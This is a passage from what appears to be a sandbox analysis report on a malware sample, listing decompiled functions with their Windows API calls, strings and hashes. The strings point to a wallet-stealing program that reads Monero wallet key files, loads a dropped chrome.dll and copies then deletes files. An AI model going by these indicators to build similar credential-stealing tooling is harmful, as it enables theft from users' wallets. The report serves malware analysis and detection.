                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 782f28a6f229c71c8a7ec9f1219b3bc0d623191acc55c48f1a9ea253b38bbcbf
                                        • Instruction ID: 68f7b4e40144702a266e4583cbafc60a3ce714adc1ae5d75f36dbaf39862de22
                                        • Opcode Fuzzy Hash: 782f28a6f229c71c8a7ec9f1219b3bc0d623191acc55c48f1a9ea253b38bbcbf
                                        • Instruction Fuzzy Hash: 5001CD79A44209FFDB14DFE4DC49FAE777CBB49701F108295FA1997290D7709A008B90
                                        Function 009868D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00986903
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 009869C6
                                        • ExitProcess.KERNEL32 ref: 009869F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: c8d49f2b91459bfdd5800833319edb8db0dd6fc42136e83cd969b6f1125b88af
                                        • Instruction ID: dcd2bab78f16facb93e9fc786c55d4d11dbf95579ce780c7f90144f63b0eca4e
                                        • Opcode Fuzzy Hash: c8d49f2b91459bfdd5800833319edb8db0dd6fc42136e83cd969b6f1125b88af
                                        • Instruction Fuzzy Hash: 0E31DDB1901218ABEB14FB90DD95FDEB778AF94300F404199F20567291DF746B48CF65
                                        Function 00988950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00990E10,00000000,?), ref: 009889BF
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009889C6
                                        • wsprintfA.USER32 ref: 009889E0
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 51d009b3ce7215b4282f569ff0544cac8aa042897b391a4438cba85eced4abd2
                                        • Instruction ID: 5bbe22658740200a0a5594147d383cc0313ed39ab3d636ebc2c47de1d7e49fcb
                                        • Opcode Fuzzy Hash: 51d009b3ce7215b4282f569ff0544cac8aa042897b391a4438cba85eced4abd2
                                        • Instruction Fuzzy Hash: 7B213DB5A44204EFDB14DFA8DD45FAEBBB8FB49710F104619FA15A7280C775A900CBA1
                                        Function 0097A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0097A098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        • Opcode ID: d1d0cfa0eedce6be558809f69b6f991d3a9f0f8286920e7e41c2799177b10343
                                        • Instruction ID: 344a457a8dc5ad1c5af43e8dd5ba10a5ef1cd71a8858fb6d9630e8a0429e045b
                                        • Opcode Fuzzy Hash: d1d0cfa0eedce6be558809f69b6f991d3a9f0f8286920e7e41c2799177b10343
                                        • Instruction Fuzzy Hash: D5F0B47964E205AFDF14AB74ED08B1E3764F397314F000A16F909936E0C3B458C4CB52
                                        Function 00988EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009896AE,00000000), ref: 00988EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00988EF2
                                        • wsprintfW.USER32 ref: 00988F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: d67a6488f8c93aec8593294fdacbed7d8e2537327f7d7647427e2142e4ddfe6b
                                        • Instruction ID: 10aed9ee6fa4767e8b5c69e2b2150bf19008d298f9552cd64c3043f7e04c252b
                                        • Opcode Fuzzy Hash: d67a6488f8c93aec8593294fdacbed7d8e2537327f7d7647427e2142e4ddfe6b
                                        • Instruction Fuzzy Hash: AAE0B679A48209FFDB10DB94DD0AB6D77A8EB46701F000294FD0997240DAB1AA109B91
                                        Function 0097A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097AA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0097AB2F
                                        • lstrlen.KERNEL32(00000000), ref: 0097ADEC
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 0097AE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 53203cf31708ffc56028588fc2a9e5d52bd59ee014874ca9cf04cb5abb27b027
                                        • Instruction ID: 2d139872395b3df9525405dc5700a2667d329ef500cae07934e7c46e0c3ec3f2
                                        • Opcode Fuzzy Hash: 53203cf31708ffc56028588fc2a9e5d52bd59ee014874ca9cf04cb5abb27b027
                                        • Instruction Fuzzy Hash: E0E1C0729101189BDB15FBA4DDA2FEE7339BFA4300F50855AF11672191EF386A4CCB62
                                        Function 0097D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097D581
                                        • lstrlen.KERNEL32(00000000), ref: 0097D798
                                        • lstrlen.KERNEL32(00000000), ref: 0097D7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 0097D82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: ace30903c02fcc55cdf0fc33f41cb85f8508c99cb51d3814c8336010484ec729
                                        • Instruction ID: 44b92b2b88475915c2e8abdd82ebc9064a474449e4ecef30eeb096c52ab43541
                                        • Opcode Fuzzy Hash: ace30903c02fcc55cdf0fc33f41cb85f8508c99cb51d3814c8336010484ec729
                                        • Instruction Fuzzy Hash: C291C5729101089BDB04FBA4DDA6FEE7339BF94300F50456AF51676291EF386A48CB62
                                        Function 0097D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097D901
                                        • lstrlen.KERNEL32(00000000), ref: 0097DA9F
                                        • lstrlen.KERNEL32(00000000), ref: 0097DAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 0097DB32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 28bc624f4a2ac618c835878f9299e12c6fab5d8153d4f8e1e18ab2d8ee4c67ca
                                        • Instruction ID: 7cc029fbec4c140eafbdbacd768355fd895b457c73bfa199f2ea7bbaa4580014
                                        • Opcode Fuzzy Hash: 28bc624f4a2ac618c835878f9299e12c6fab5d8153d4f8e1e18ab2d8ee4c67ca
                                        • Instruction Fuzzy Hash: 0081C4729101089BDF04FBA4DCA6FEE7339BF95300F50456AF51676291EF386A08CB62
                                        Function 009EFED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction ID: 072e7f8d95bdd0b8804b4af86641d45c8c62061ba76913995215fb0f961ddb15
                                        • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction Fuzzy Hash: 8351487260124AAFEB268F16C851BBA77A8FF85310F28493EF90547592EB31EC40D790
                                        Function 0097A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0097A664
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
